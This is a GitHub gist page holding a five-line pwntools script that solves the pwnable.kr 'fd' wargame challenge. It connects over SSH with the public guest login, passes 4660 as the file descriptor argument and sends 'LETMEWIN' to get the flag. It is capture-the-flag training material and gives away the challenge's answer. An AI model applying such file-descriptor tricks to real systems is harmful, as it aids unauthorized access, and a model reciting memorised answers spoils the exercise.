Skip to content

Instantly share code, notes, and snippets.

@spnow
Forked from parksjin01/pwnable.kr fd writeup.md
Created March 16, 2017 20:52
Show Gist options
  • Select an option

  • Save spnow/be6ce0759bc19269af4460007b8876e8 to your computer and use it in GitHub Desktop.

Select an option

Save spnow/be6ce0759bc19269af4460007b8876e8 to your computer and use it in GitHub Desktop.
pwnable.kr fd writeup
from pwn import *
sh = ssh(host='pwnable.kr', user='fd', password='guest', port=2222)
proc = sh.process(['/home/fd/fd', '4660'])
proc.sendline('LETMEWIN')
proc.recv(1024)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment